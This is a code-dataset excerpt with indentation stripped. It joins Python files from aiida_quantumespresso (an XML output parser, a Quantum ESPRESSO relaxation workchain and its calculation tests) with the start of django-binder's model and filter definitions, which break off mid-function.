for tagname2 in ['FRACTIONAL_TRANSLATION', 'EQUIVALENT_IONS']: # not always present
try:
b = a.getElementsByTagName(tagname2)[0]
if tagname2 == 'FRACTIONAL_TRANSLATION':
value = [float(s) for s in b.childNodes[0].data.split()]
else:
value = [int(s) for s in b.childNodes[0].data.split()]
current_sym[tagname2.lower()] = value
except Exception:
raise
parsed_data['symmetries'].append(current_sym)
except IndexError: # SYMM.i out of index
find_sym = False
return parsed_data
def xml_card_exchangecorrelation(parsed_data, dom):
cardname = 'EXCHANGE_CORRELATION'
target_tags = read_xml_card(dom, cardname)
tagname = 'DFT'
parsed_data[(tagname+'_exchange_correlation').lower()] = \
parse_xml_child_str(tagname,target_tags)
tagname = 'LDA_PLUS_U_CALCULATION'
try:
parsed_data[tagname.lower()] = parse_xml_child_bool(tagname, target_tags)
except Exception:
parsed_data[tagname.lower()] = False
if parsed_data[tagname.lower()]: # if it is a plus U calculation, I expect more infos
tagname = 'HUBBARD_L'
try:
#a = target_tags.getElementsByTagName(tagname)[0]
a = [_ for _ in target_tags.childNodes if _.nodeName == tagname][0]
b = a.childNodes[0]
c = b.data.replace('\n', '').split()
value = [int(i) for i in c]
parsed_data[tagname.lower()] = value
except Exception:
raise QEOutputParsingError('Error parsing tag '+\
'{} inside {}.'.format(tagname, target_tags.tagName) )
for tagname in ['HUBBARD_U', 'HUBBARD_ALPHA', 'HUBBARD_BETA', 'HUBBARD_J0']:
try:
#a = target_tags.getElementsByTagName(tagname)[0]
a = [_ for _ in target_tags.childNodes if _.nodeName == tagname][0]
b = a.childNodes[0]
c = b.data.replace('\n', ' ').split() # note the need of a white space!
value = [float(i) * CONSTANTS.ry_to_ev for i in c]
parsed_data[tagname.lower()] = value
except Exception:
raise QEOutputParsingError('Error parsing tag '+\
'{} inside {}.'.format(tagname, target_tags.tagName))
tagname = 'LDA_PLUS_U_KIND'
try:
parsed_data[tagname.lower()] = parse_xml_child_integer(tagname, target_tags)
except Exception:
pass
tagname = 'U_PROJECTION_TYPE'
try:
parsed_data[tagname.lower()] = parse_xml_child_str(tagname, target_tags)
except Exception:
pass
tagname = 'HUBBARD_J'
try:
#a=target_tags.getElementsByTagName(tagname)[0]
a = [_ for _ in target_tags.childNodes if _.nodeName == tagname][0]
b = a.childNodes[0]
c = b.data.replace('\n', '').split()
parsed_data[tagname.lower()] = convert_list_to_matrix(c, 3, 3)
except Exception:
pass
try:
tagname = 'NON_LOCAL_DF'
parsed_data[tagname.lower()] = parse_xml_child_integer(tagname, target_tags)
except Exception:
pass
try:
tagname = 'VDW_KERNEL_NAME'
parsed_data[tagname.lower()] = parse_xml_child_str(tagname, target_tags)
except Exception:
pass
return parsed_data
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
"""Workchain to relax a structure using Quantum ESPRESSO pw.x."""
from aiida import orm
from aiida.common import AttributeDict, exceptions
from aiida.engine import WorkChain, ToContext, if_, while_, append_
from aiida.plugins import CalculationFactory, WorkflowFactory
from aiida_quantumespresso.utils.mapping import prepare_process_inputs
PwCalculation = CalculationFactory('quantumespresso.pw')
PwBaseWorkChain = WorkflowFactory('quantumespresso.pw.base')
class PwRelaxWorkChain(WorkChain):
"""Workchain to relax a structure using Quantum ESPRESSO pw.x."""
@classmethod
def define(cls, spec):
"""Define the process specification."""
# yapf: disable
super().define(spec)
spec.expose_inputs(PwBaseWorkChain, namespace='base',
exclude=('clean_workdir', 'pw.structure', 'pw.parent_folder'),
namespace_options={'help': 'Inputs for the `PwBaseWorkChain`.'})
spec.input('structure', valid_type=orm.StructureData, help='The inputs structure.')
spec.input('final_scf', valid_type=orm.Bool, default=lambda: orm.Bool(False),
help='If `True`, a final SCF calculation will be performed on the successfully relaxed structure.')
spec.input('relaxation_scheme', valid_type=orm.Str, default=lambda: orm.Str('vc-relax'),
help='The relaxation scheme to use: choose either `relax` or `vc-relax` for variable cell relax.')
spec.input('meta_convergence', valid_type=orm.Bool, default=lambda: orm.Bool(True),
help='If `True` the workchain will perform a meta-convergence on the cell volume.')
spec.input('max_meta_convergence_iterations', valid_type=orm.Int, default=lambda: orm.Int(5),
help='The maximum number of variable cell relax iterations in the meta convergence cycle.')
spec.input('volume_convergence', valid_type=orm.Float, default=lambda: orm.Float(0.01),
help='The volume difference threshold between two consecutive meta convergence iterations.')
spec.input('clean_workdir', valid_type=orm.Bool, default=lambda: orm.Bool(False),
help='If `True`, work directories of all called calculation will be cleaned at the end of execution.')
spec.outline(
cls.setup,
while_(cls.should_run_relax)(
cls.run_relax,
cls.inspect_relax,
),
if_(cls.should_run_final_scf)(
cls.run_final_scf,
cls.inspect_final_scf,
),
cls.results,
)
spec.exit_code(401, 'ERROR_SUB_PROCESS_FAILED_RELAX',
message='the relax PwBaseWorkChain sub process failed')
spec.exit_code(402, 'ERROR_SUB_PROCESS_FAILED_FINAL_SCF',
message='the final scf PwBaseWorkChain sub process failed')
spec.expose_outputs(PwBaseWorkChain, exclude=('output_structure',))
spec.output('output_structure', valid_type=orm.StructureData, required=True,
help='The successfully relaxed structure.')
def setup(self):
"""Input validation and context setup."""
self.ctx.current_number_of_bands = None
self.ctx.current_structure = self.inputs.structure
self.ctx.current_cell_volume = None
self.ctx.is_converged = False
self.ctx.iteration = 0
def should_run_relax(self):
"""Return whether a relaxation workchain should be run.
This is the case as long as the volume change between two consecutive relaxation runs is larger than the volume
convergence threshold value and the maximum number of meta convergence iterations is not exceeded.
"""
return not self.ctx.is_converged and self.ctx.iteration < self.inputs.max_meta_convergence_iterations.value
def should_run_final_scf(self):
"""Return whether after successful relaxation a final scf calculation should be run.
If the maximum number of meta convergence iterations has been exceeded and convergence has not been reached, the
structure cannot be considered to be relaxed and the final scf should not be run.
"""
return self.inputs.final_scf.value and self.ctx.is_converged
def run_relax(self):
"""Run the `PwBaseWorkChain` to run a relax `PwCalculation`."""
self.ctx.iteration += 1
inputs = AttributeDict(self.exposed_inputs(PwBaseWorkChain, namespace='base'))
inputs.pw.structure = self.ctx.current_structure
inputs.pw.parameters = inputs.pw.parameters.get_dict()
inputs.pw.parameters.setdefault('CONTROL', {})
inputs.pw.parameters['CONTROL']['calculation'] = self.inputs.relaxation_scheme.value
inputs.pw.parameters['CONTROL']['restart_mode'] = 'from_scratch'
# If one of the nested `PwBaseWorkChains` changed the number of bands, apply it here
if self.ctx.current_number_of_bands is not None:
inputs.pw.parameters.setdefault('SYSTEM', {})['nbnd'] = self.ctx.current_number_of_bands
# Set the `CALL` link label
inputs.metadata.call_link_label = 'iteration_{:02d}'.format(self.ctx.iteration)
inputs = prepare_process_inputs(PwBaseWorkChain, inputs)
running = self.submit(PwBaseWorkChain, **inputs)
self.report('launching PwBaseWorkChain<{}>'.format(running.pk))
return ToContext(workchains=append_(running))
def inspect_relax(self):
"""Inspect the results of the last `PwBaseWorkChain`.
Compare the cell volume of the relaxed structure of the last completed workchain with the previous. If the
difference ratio is less than the volume convergence threshold we consider the cell relaxation converged.
"""
workchain = self.ctx.workchains[-1]
acceptable_statuses = [
'ERROR_IONIC_CONVERGENCE_REACHED_EXCEPT_IN_FINAL_SCF'
]
if workchain.is_excepted or workchain.is_killed:
self.report('relax PwBaseWorkChain was excepted or killed')
return self.exit_codes.ERROR_SUB_PROCESS_FAILED_RELAX
if workchain.is_failed and workchain.exit_status not in PwBaseWorkChain.get_exit_statuses(acceptable_statuses):
self.report('relax PwBaseWorkChain failed with exit status {}'.format(workchain.exit_status))
return self.exit_codes.ERROR_SUB_PROCESS_FAILED_RELAX
try:
structure = workchain.outputs.output_structure
except exceptions.NotExistent:
self.report('relax PwBaseWorkChain finished successful but without output structure')
return self.exit_codes.ERROR_SUB_PROCESS_FAILED_RELAX
prev_cell_volume = self.ctx.current_cell_volume
curr_cell_volume = structure.get_cell_volume()
# Set relaxed structure as input structure for next iteration
self.ctx.current_structure = structure
self.ctx.current_number_of_bands = workchain.outputs.output_parameters.get_dict()['number_of_bands']
self.report('after iteration {} cell volume of relaxed structure is {}'
.format(self.ctx.iteration, curr_cell_volume))
# After first iteration, simply set the cell volume and restart the next base workchain
if not prev_cell_volume:
self.ctx.current_cell_volume = curr_cell_volume
# If meta convergence is switched off we are done
if not self.inputs.meta_convergence.value:
self.ctx.is_converged = True
return
# Check whether the cell volume is converged
volume_threshold = self.inputs.volume_convergence.value
volume_difference = abs(prev_cell_volume - curr_cell_volume) / prev_cell_volume
if volume_difference < volume_threshold:
self.ctx.is_converged = True
self.report('relative cell volume difference {} smaller than convergence threshold {}'
.format(volume_difference, volume_threshold))
else:
self.report('current relative cell volume difference {} larger than convergence threshold {}'
.format(volume_difference, volume_threshold))
self.ctx.current_cell_volume = curr_cell_volume
return
def run_final_scf(self):
"""Run the `PwBaseWorkChain` to run a final scf `PwCalculation` for the relaxed structure."""
inputs = AttributeDict(self.exposed_inputs(PwBaseWorkChain, namespace='base'))
inputs.pw.structure = self.ctx.current_structure
inputs.pw.parameters = inputs.pw.parameters.get_dict()
inputs.pw.parameters.setdefault('CONTROL', {})
inputs.pw.parameters['CONTROL']['calculation'] = 'scf'
inputs.pw.parameters['CONTROL']['restart_mode'] = 'from_scratch'
inputs.pw.parameters.pop('CELL', None)
inputs.metadata.call_link_label = 'final_scf'
if self.ctx.current_number_of_bands is not None:
inputs.pw.parameters.setdefault('SYSTEM', {})['nbnd'] = self.ctx.current_number_of_bands
inputs = prepare_process_inputs(PwBaseWorkChain, inputs)
running = self.submit(PwBaseWorkChain, **inputs)
self.report('launching PwBaseWorkChain<{}> for final scf'.format(running.pk))
return ToContext(workchain_scf=running)
def inspect_final_scf(self):
"""Inspect the result of the final scf `PwBaseWorkChain`."""
workchain = self.ctx.workchain_scf
if not workchain.is_finished_ok:
self.report('final scf PwBaseWorkChain failed with exit status {}'.format(workchain.exit_status))
return self.exit_codes.ERROR_SUB_PROCESS_FAILED_FINAL_SCF
def results(self):
"""Attach the output parameters and structure of the last workchain to the outputs."""
if self.ctx.is_converged and self.ctx.iteration <= self.inputs.max_meta_convergence_iterations.value:
self.report('workchain completed after {} iterations'.format(self.ctx.iteration))
else:
self.report('maximum number of meta convergence iterations exceeded')
# Get the latest workchain, which is either the workchain_scf if it ran or otherwise the last regular workchain
try:
workchain = self.ctx.workchain_scf
structure = workchain.inputs.pw__structure
except AttributeError:
workchain = self.ctx.workchains[-1]
structure = workchain.outputs.output_structure
self.out_many(self.exposed_outputs(workchain, PwBaseWorkChain))
self.out('output_structure', structure)
def on_terminated(self):
"""Clean the working directories of all child calculations if `clean_workdir=True` in the inputs."""
super().on_terminated()
if self.inputs.clean_workdir.value is False:
self.report('remote folders will not be cleaned')
return
cleaned_calcs = []
for called_descendant in self.node.called_descendants:
if isinstance(called_descendant, orm.CalcJobNode):
try:
called_descendant.outputs.remote_folder._clean() # pylint: disable=protected-access
cleaned_calcs.append(called_descendant.pk)
except (IOError, OSError, KeyError):
pass
if cleaned_calcs:
self.report('cleaned remote folders of calculations: {}'.format(' '.join(map(str, cleaned_calcs))))
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
"""Tests for the `PwCalculation` class."""
import pytest
from aiida import orm
from aiida.common import datastructures
from aiida_quantumespresso.utils.resources import get_default_options
from aiida_quantumespresso.calculations.helpers import QEInputValidationError
def test_pw_default(fixture_sandbox, generate_calc_job, generate_inputs_pw, file_regression):
"""Test a default `PwCalculation`."""
entry_point_name = 'quantumespresso.pw'
inputs = generate_inputs_pw()
calc_info = generate_calc_job(fixture_sandbox, entry_point_name, inputs)
upf = inputs['pseudos']['Si']
cmdline_params = ['-in', 'aiida.in']
local_copy_list = [(upf.uuid, upf.filename, './pseudo/Si.upf')]
retrieve_list = ['aiida.out', './out/aiida.save/data-file-schema.xml', './out/aiida.save/data-file.xml']
retrieve_temporary_list = [['./out/aiida.save/K*[0-9]/eigenval*.xml', '.', 2]]
# Check the attributes of the returned `CalcInfo`
assert isinstance(calc_info, datastructures.CalcInfo)
assert sorted(calc_info.cmdline_params) == sorted(cmdline_params)
assert sorted(calc_info.local_copy_list) == sorted(local_copy_list)
assert sorted(calc_info.retrieve_list) == sorted(retrieve_list)
assert sorted(calc_info.retrieve_temporary_list) == sorted(retrieve_temporary_list)
assert sorted(calc_info.remote_symlink_list) == sorted([])
with fixture_sandbox.open('aiida.in') as handle:
input_written = handle.read()
# Checks on the files written to the sandbox folder as raw input
assert sorted(fixture_sandbox.get_content_list()) == sorted(['aiida.in', 'pseudo', 'out'])
file_regression.check(input_written, encoding='utf-8', extension='.in')
def test_pw_ibrav(
fixture_sandbox, generate_calc_job, fixture_code, generate_kpoints_mesh, generate_upf_data, file_regression
):
"""Test a `PwCalculation` where `ibrav` is explicitly specified."""
entry_point_name = 'quantumespresso.pw'
parameters = {'CONTROL': {'calculation': 'scf'}, 'SYSTEM': {'ecutrho': 240.0, 'ecutwfc': 30.0, 'ibrav': 2}}
# The structure needs to be rotated in the same way QE does it for ibrav=2.
param = 5.43
cell = [[-param / 2., 0, param / 2.], [0, param / 2., param / 2.], [-param / 2., param / 2., 0]]
structure = orm.StructureData(cell=cell)
structure.append_atom(position=(0., 0., 0.), symbols='Si', name='Si')
structure.append_atom(position=(param / 4., param / 4., param / 4.), symbols='Si', name='Si')
upf = generate_upf_data('Si')
inputs = {
'code': fixture_code(entry_point_name),
'structure': structure,
'kpoints': generate_kpoints_mesh(2),
'parameters': orm.Dict(dict=parameters),
'pseudos': {
'Si': upf
},
'metadata': {
'options': get_default_options()
}
}
calc_info = generate_calc_job(fixture_sandbox, entry_point_name, inputs)
cmdline_params = ['-in', 'aiida.in']
local_copy_list = [(upf.uuid, upf.filename, u'./pseudo/Si.upf')]
retrieve_list = ['aiida.out', './out/aiida.save/data-file-schema.xml', './out/aiida.save/data-file.xml']
retrieve_temporary_list = [['./out/aiida.save/K*[0-9]/eigenval*.xml', '.', 2]]
# Check the attributes of the returned `CalcInfo`
assert isinstance(calc_info, datastructures.CalcInfo)
assert sorted(calc_info.cmdline_params) == sorted(cmdline_params)
assert sorted(calc_info.local_copy_list) == sorted(local_copy_list)
assert sorted(calc_info.retrieve_list) == sorted(retrieve_list)
assert sorted(calc_info.retrieve_temporary_list) == sorted(retrieve_temporary_list)
assert sorted(calc_info.remote_symlink_list) == sorted([])
with fixture_sandbox.open('aiida.in') as handle:
input_written = handle.read()
# Checks on the files written to the sandbox folder as raw input
assert sorted(fixture_sandbox.get_content_list()) == sorted(['aiida.in', 'pseudo', 'out'])
file_regression.check(input_written, encoding='utf-8', extension='.in')
def test_pw_wrong_ibrav(fixture_sandbox, generate_calc_job, fixture_code, generate_kpoints_mesh, generate_upf_data):
"""Test that a `PwCalculation` with an incorrect `ibrav` raises."""
entry_point_name = 'quantumespresso.pw'
parameters = {'CONTROL': {'calculation': 'scf'}, 'SYSTEM': {'ecutrho': 240.0, 'ecutwfc': 30.0, 'ibrav': 2}}
# Here we use the wrong order of unit cell vectors on purpose.
param = 5.43
cell = [[0, param / 2., param / 2.], [-param / 2., 0, param / 2.], [-param / 2., param / 2., 0]]
structure = orm.StructureData(cell=cell)
structure.append_atom(position=(0., 0., 0.), symbols='Si', name='Si')
structure.append_atom(position=(param / 4., param / 4., param / 4.), symbols='Si', name='Si')
upf = generate_upf_data('Si')
inputs = {
'code': fixture_code(entry_point_name),
'structure': structure,
'kpoints': generate_kpoints_mesh(2),
'parameters': orm.Dict(dict=parameters),
'pseudos': {
'Si': upf
},
'metadata': {
'options': get_default_options()
}
}
with pytest.raises(QEInputValidationError):
generate_calc_job(fixture_sandbox, entry_point_name, inputs)
def test_pw_ibrav_tol(fixture_sandbox, generate_calc_job, fixture_code, generate_kpoints_mesh, generate_upf_data):
"""Test that `IBRAV_TOLERANCE` controls the tolerance when checking cell consistency."""
entry_point_name = 'quantumespresso.pw'
parameters = {'CONTROL': {'calculation': 'scf'}, 'SYSTEM': {'ecutrho': 240.0, 'ecutwfc': 30.0, 'ibrav': 2}}
# The structure needs to be rotated in the same way QE does it for ibrav=2.
param = 5.43
eps = 0.1
cell = [[-param / 2., eps, param / 2.], [-eps, param / 2. + eps, param / 2.], [-param / 2., param / 2., 0]]
structure = orm.StructureData(cell=cell)
structure.append_atom(position=(0., 0., 0.), symbols='Si', name='Si')
structure.append_atom(position=(param / 4., param / 4., param / 4.), symbols='Si', name='Si')
upf = generate_upf_data('Si')
inputs = {
'code': fixture_code(entry_point_name),
'structure': structure,
'kpoints': generate_kpoints_mesh(2),
'parameters': orm.Dict(dict=parameters),
'pseudos': {
'Si': upf
},
'metadata': {
'options': get_default_options()
},
}
# Without adjusting the tolerance, the check fails.
with pytest.raises(QEInputValidationError):
generate_calc_job(fixture_sandbox, entry_point_name, inputs)
# After adjusting the tolerance, the input validation no longer fails.
inputs['settings'] = orm.Dict(dict={'ibrav_cell_tolerance': eps})
generate_calc_job(fixture_sandbox, entry_point_name, inputs)
|
[
"/aiida_quantumespresso/calculations/cp.py",
"/aiida_quantumespresso/cli/workflows/pw/bands.py",
"/aiida_quantumespresso/cli/workflows/pw/relax.py",
"/aiida_quantumespresso/parsers/__init__.py",
"/aiida_quantumespresso/parsers/cp.py",
"/aiida_quantumespresso/parsers/parse_xml/pw/legacy.py",
"/aiida_quantumespresso/workflows/pw/relax.py",
"/tests/calculations/test_pw.py"
] |
00mjk/django-binder
|
import re
import warnings
from collections import defaultdict
from datetime import date, datetime, time
from contextlib import suppress
from django.db import models
from django.contrib.postgres.fields import CITextField, ArrayField, JSONField
from django.db.models import signals
from django.core.exceptions import ValidationError
from django.db.models.query_utils import Q
from django.utils import timezone
from django.utils.dateparse import parse_date, parse_datetime
from binder.json import jsonloads
from binder.exceptions import BinderRequestError
from . import history
class CaseInsensitiveCharField(CITextField):
def __init__(self, *args, **kwargs):
warnings.warn(DeprecationWarning('CaseInsensitiveCharField is deprecated, use django.contrib.postgres.fields.CITextField instead'))
return super().__init__(*args, **kwargs)
class UpperCaseCharField(CITextField):
def get_prep_value(self, value):
value = super().get_prep_value(value)
if value is None:
return None
return value.upper()
class LowerCaseCharField(CITextField):
def get_prep_value(self, value):
value = super().get_prep_value(value)
if value is None:
return None
return value.lower()
class ChoiceEnum(object):
def __init__(self, *args, **kwargs):
self.items = kwargs
for k in args:
if k == '':
self.items['NONE'] = ''
else:
self.items[re.sub('[ /+-]', '_', k).upper()] = k
self.__dict__.update(self.items)
def choices(self):
return tuple(sorted((v, k) for k, v in self.items.items()))
def name(self, value, default=None):
if value is None:
return default
for k, v in self.items.items():
if v == value:
return k
raise ValueError()
def __call__(self, **kwargs):
return models.CharField(
choices=self.choices(),
max_length=max(map(len, self.items.values())),
**kwargs
)
class FieldFilter(object):
# The classes that this filter applies to (should be mutually
# exclusive with the other classes)
fields = []
# The list of allowed qualifiers
allowed_qualifiers = []
def __init__(self, field):
self.field = field
def field_description(self):
return '{} {{{}}}.{{{}}}'.format(self.field.__class__.__name__, self.field.model.__name__, self.field.name)
def clean_value(self, qualifier, v):
raise ValueError('FieldFilter {} has not overridden the clean_value method'.format(self.__class__.name))
def check_qualifier(self, qualifier):
if qualifier not in self.allowed_qualifiers:
raise BinderRequestError('Qualifier {} not supported for type {} ({}).'
.format(qualifier, self.__class__.__name__, self.field_description()))
def get_q(self, qualifier, value, invert, partial=''):
self.check_qualifier(qualifier)
# TODO: Try to make the splitting and cleaning more re-usable
if qualifier in ('in', 'range'):
values = value.split(',')
if qualifier == 'range':
if len(values) != 2:
raise BinderRequestError('Range requires exactly 2 values for {}.'.format(self.field_description()))
else:
values = [value]
if qualifier == 'isnull':
cleaned_value = True
elif qualifier in ('in', 'range'):
cleaned_value = [self.clean_value(qualifier, v) for v in values]
else:
try:
cleaned_value = self.clean_value(qualifier, values[0])
except IndexError:
raise ValidationError('Value for filter {{{}}}.{{{}}} may not be empty.'.format(self.field.model.__name__, self.field.name))
suffix = '__' + qualifier if qualifier else ''
if invert:
return ~Q(**{partial + self.field.name + suffix: cleaned_value})
else:
return Q(**{partial + self.field.name + suffix: cleaned_value})
class IntegerFieldFilter(FieldFilter):
fields = [
models.IntegerField,
models.ForeignKey,
models.AutoField,
models.ManyToOneRel,
models.ManyToManyField,
models.ManyToManyRel,
]
allowed_qualifiers = [None, 'in', 'gt', 'gte', 'lt', 'lte', 'range', 'isnull']
def clean_value(self, qualifier, v):
try:
return int(v)
except ValueError:
raise ValidationError('Invalid value {{{}}} for {}.'.format(v, self.field_description()))
class FloatFieldFilter(FieldFilter):
fields = [models.FloatField]
allowed_qualifiers = [None, 'in', 'gt', 'gte', 'lt', 'lte', 'range', 'isnull']
def clean_value(self, qualifier, v):
try:
return float(v)
except ValueError:
raise ValidationError('Invalid value {{{}}} for {}.'.format(v, self.field_description()))
class DateFieldFilter(FieldFilter):
fields = [models.DateField]
# Maybe allow __startswith? And __year etc?
allowed_qualifiers = [None, 'in', 'gt', 'gte', 'lt', 'lte', 'range', 'isnull']
def clean_value(self, qualifier, v):
if not re.match('^[0-9]{4}-[0-9]{2}-[0-9]{2}$', v):
raise ValidationError('Invalid YYYY-MM-DD value {{{}}} for {}.'.format(v, self.field_description()))
else:
return parse_date(v)
return v
class DateTimeFieldFilter(FieldFilter):
fields = [models.DateTimeField]
# Maybe allow __startswith? And __year etc?
allowed_qualifiers = [None, 'in', 'gt', 'gte', 'lt', 'lte', 'range', 'isnull']
def clean_value(self, qualifier, v):
if re.match('^[0-9]{4}-[0-9]{2}-[0-9]{2}[T ][0-9]{2}:[0-9]{2}:[0-9]{2}([.][0-9]+)?([A-Za-z]+|[+-][0-9]{1,4})$', v):
return parse_datetime(v)
if re.match('^[0-9]{4}-[0-9]{2}-[0-9]{2}$', v):
return parse_date(v)
else:
raise ValidationError('Invalid YYYY-MM-DD(.mmm)ZONE value {{{}}} for {}.'.format(v, self.field_description()))
return v
def get_q(self, qualifier, value, invert, partial=''):
self.check_qualifier(qualifier)
# TODO: Try to make the splitting and cleaning more re-usable
if qualifier in ('in', 'range'):
values = value.split(',')
if qualifier == 'range':
if len(values) != 2:
raise BinderRequestError('Range requires exactly 2 values for {}.'.format(self.field_description()))
else:
values = [value]
if qualifier == 'isnull':
cleaned_value = True
elif qualifier in ('in', 'range'):
cleaned_value = [self.clean_value(qualifier, v) for v in values]
types = {type(v) for v in cleaned_value}
if len(types) != 1:
raise ValidationError('Values for filter {{{}}}.{{{}}} must be the same types.'.format(self.field.model.__name__, self.field.name))
if isinstance(cleaned_value[0], date) and not isinstance(cleaned_value[0], datetime):
qualifier = 'date__' + qualifier
else:
try:
cleaned_value = self.clean_value(qualifier, values[0])
if isinstance(cleaned_value, date) and not isinstance(cleaned_value, datetime):
qualifier = 'date__' + qualifier if qualifier else 'date'
except IndexError:
raise ValidationError('Value for filter {{{}}}.{{{}}} may not be empty.'.format(self.field.model.__name__, self.field.name))
suffix = '__' + qualifier if qualifier else ''
if invert:
return ~Q(**{partial + self.field.name + suffix: cleaned_value})
else:
return Q(**{partial + self.field.name + suffix: cleaned_value})
class TimeFieldFilter(FieldFilter):
fields = [models.TimeField]
# Maybe allow __startswith? And __year etc?
allowed_qualifiers = [None, 'in', 'gt', 'gte', 'lt', 'lte', 'range', 'isnull']
time_re = re.compile(r'^(\d{2}):(\d{2}):(\d{2})(?:\.(\d+))?(Z|[+-]\d{2}(?:\d{2})?)$')
def clean_value(self, qualifier, v):
# Match value
match = self.time_re.match(v)
if not match:
raise ValidationError('Invalid HH:MM:SS(.mmm) value {{{}}} for {}.'.format(v, self.field_description()))
# Get values
hour, minute, second, microsecond, tzinfo = match.groups()
hour = int(hour)
minute = int(minute)
second = int(second)
microsecond = int((microsecond or '').ljust(6, '0'))
if tzinfo == 'Z':
tzinfo = timezone.utc
else:
tzinfo = tzinfo.ljust(5, '0')
offset = int(tzinfo[1:3]) * 60 + int(tzinfo[3:5])
if tzinfo.startswith('-'):
offset = -offset
tzinfo = timezone.get_fixed_timezone(offset)
# Create time object
return time(
hour=hour,
minute=minute,
second=second,
microsecond=microsecond,
tzinfo=tzinfo,
)
class BooleanFieldFilter(FieldFilter):
fields = [models.BooleanField]
allowed_qualifiers = [None]
def clean_value(self, qualifier, v):
if v == 'true':
return True
elif v == 'false':
return False
else:
raise ValidationError('Invalid value {{{}}} for {}.'.format(v, self.field_description()))
class TextFieldFilter(FieldFilter):
fields = [models.CharField, models.TextField]
allowed_qualifiers = [None, 'in', 'iexact', 'contains', 'icontains', 'startswith', 'istartswith', 'endswith', 'iendswith', 'exact', 'isnull']
# Always valid(?)
def clean_value(self, qualifier, v):
return v
class UUIDFieldFilter(FieldFilter):
fields = [models.UUIDField]
allowed_qualifiers = [None, 'in', 'iexact', 'contains', 'icontains', 'startswith', 'istartswith', 'endswith', 'iendswith', 'exact']
# Always valid; when using "contains" this doesn't need to be
# an actually formatted uuid.
def clean_value(self, qualifier, v):
return v
class ArrayFieldFilter(FieldFilter):
fields = [ArrayField]
allowed_qualifiers = [None, 'contains', 'contained_by', 'overlap', 'isnull']
# Some copy/pasta involved....
def get_field_filter(self, field_class, reset=False):
f = not reset and getattr(self, '_field_filter', None)
if not f:
f = None
for field_filter_cls in FieldFilter.__subclasses__():
for field_cls in field_filter_cls.fields:
if field_cls == field_class:
f = field_filter_cls
break
self._field_filter = f
return f
def clean_value(self, qualifier, v):
Filter = self.get_field_filter(self.field.base_field.__class__)
filter = Filter(self.field.base_field)
if v == '': # Special case: This should represent the empty array, not an array with one empty string
return []
else:
values = v.split(',')
return list(map(lambda v: filter.clean_value(qualifier, v), values))
class JSONFieldFilter(FieldFilter):
fields = [JSONField]
# TODO: Element or path-based lookup is not supported yet
allowed_qualifiers = [None, 'contains', 'contained_by', 'has_key', 'has_any_keys', 'has_keys', 'isnull']
def clean_value(self, qualifier, v):
if qualifier == 'has_key':
return v
elif qualifier in ('has_keys', 'has_any_keys'):
if v == '':
return []
else:
return v.split(',')
else:
# Use bytes to allow decode() to work. We don't just
# json.loads because we want to behave identically to
# any other Binder JSON decode when there are errors.
return jsonloads(bytes(v, 'utf-8'))
class BinderModelBase(models.base.ModelBase):
def __new__(cls, name, bases, attrs):
# Verify that any Foo(BinderModel).Meta descends from BinderModel.Meta. Django messes
# around with Meta a lot in its metaclass, to the point where we can no longer check this.
# So we have to inject our own metaclass.__new__ to find this. See #96
# Bonus points: this way we throw all these warnings at startup.
# NameError: happens when name='BinderModel' -> ignore
# KeyError: happens when Foo doesn't declare Meta -> ignore
with suppress(NameError, KeyError):
if not issubclass(attrs['Meta'], BinderModel.Meta):
warnings.warn(RuntimeWarning('{}.{}.Meta does not descend from BinderModel.Meta'.format(attrs.get('__module__'), name)))
return super().__new__(cls, name, bases, attrs)
class BinderModel(models.Model, metaclass=BinderModelBase):
def binder_concrete_fields_as_dict(self, skip_deferred_fields=False):
fields = {}
deferred_fields = self.get_deferred_fields()
for field in [f for f in self._meta.get_fields() if f.concrete and not f.many_to_many]:
if skip_deferred_fields and field.attname in deferred_fields:
continue
elif isinstance(field, models.ForeignKey):
fields[field.name] = getattr(self, field.name + '_id')
elif isinstance(field, models.FileField):
fields[field.name] = str(getattr(self, field.name))
else:
fields[field.name] = getattr(self, field.name)
return fields
def binder_serialize_m2m_field(self, field):
if isinstance(field, str):
field = getattr(self, field)
try:
extended_m2m = field.through.binder_is_binder_model
except AttributeError:
extended_m2m = False
# Regular many to many; get a list of the target ids.
if not extended_m2m:
return set(field.values_list('id', flat=True))
# Extended m2m; get dicts of the intermediary join table objects
data = list(field.through.objects.filter(**{field.source_field.name: self.id}).values())
# Then, modify them to leave out the PKs and source ids. Also, rename target ids to 'id'.
for d in data:
d.pop('id')
d.pop(field.source_field.name + '_id')
d['id'] = d.pop(field.target_field.name + '_id')
return set(sorted(d.items()) for d in data)
binder_is_binder_model = True
class Binder:
history = False
class Meta:
abstract = True
ordering = ['pk']
def save(self, *args, **kwargs):
self.full_clean() # Never allow saving invalid models!
return super().save(*args, **kwargs)
# This can be overridden in your model when there are special
# validation rules like partial indexes that may need to be
# recomputed when other fields change.
def field_requires_clean_validation(self, field):
return self.field_changed(field)
def full_clean(self, exclude=None, *args, **kwargs):
# Determine if the field needs an extra nullability check.
# Expects the field object (not the field name)
def field_needs_nullability_check(field):
if isinstance(field, (models.CharField, models.TextField, models.BooleanField)):
if field.blank and not field.null:
return True
return False
# Gather unchanged fields if LoadedValues mixin available, to
# avoid querying uniqueness constraints for unchanged
# relations (an useful performance optimization).
if hasattr(self, 'field_changed'):
exclude = set(exclude) if exclude else set()
for f in self.binder_concrete_fields_as_dict(skip_deferred_fields=True):
if not self.field_requires_clean_validation(f):
exclude.add(f)
validation_errors = defaultdict(list)
try:
res = super().full_clean(exclude=exclude, *args, **kwargs)
except ValidationError as ve:
if hasattr(ve, 'error_dict'):
for key, value in ve.error_dict.items():
validation_errors[key] += value
elif hasattr(ve, 'error_list'):
for e in ve.error_list:
validation_errors['null'].append(e) # XXX
# Django's standard full_clean() doesn't complain about some
# not-NULL fields being None. This causes save() to explode
# with a django.db.IntegrityError because the column is NOT
# NULL. Tyvm, Django. So we perform an extra NULL check for
# some cases. See #66, T2989, T9646.
for f in self._meta.fields:
if field_needs_nullability_check(f):
# gettattr on a foreignkey foo gets the related model, while foo_id just gets the id.
# We don't need or want the model (nor the DB query), we'll take the id thankyouverymuch.
name = f.name + ('_id' if isinstance(f, models.ForeignKey) else '')
if getattr(self, name) is None and getattr(self, f.name) is None:
validation_errors[f.name].append(ValidationError(
'This field cannot be null.',
code='null',
))
if validation_errors:
raise ValidationError(validation_errors)
else:
return res
def history_obj_post_init(sender, instance, **kwargs):
instance._history = instance.binder_concrete_fields_as_dict(skip_deferred_fields=True)
if not instance.pk:
instance._history = {k: history.NewInstanceField for k in instance._history}
def history_obj_post_save(sender, instance, **kwargs):
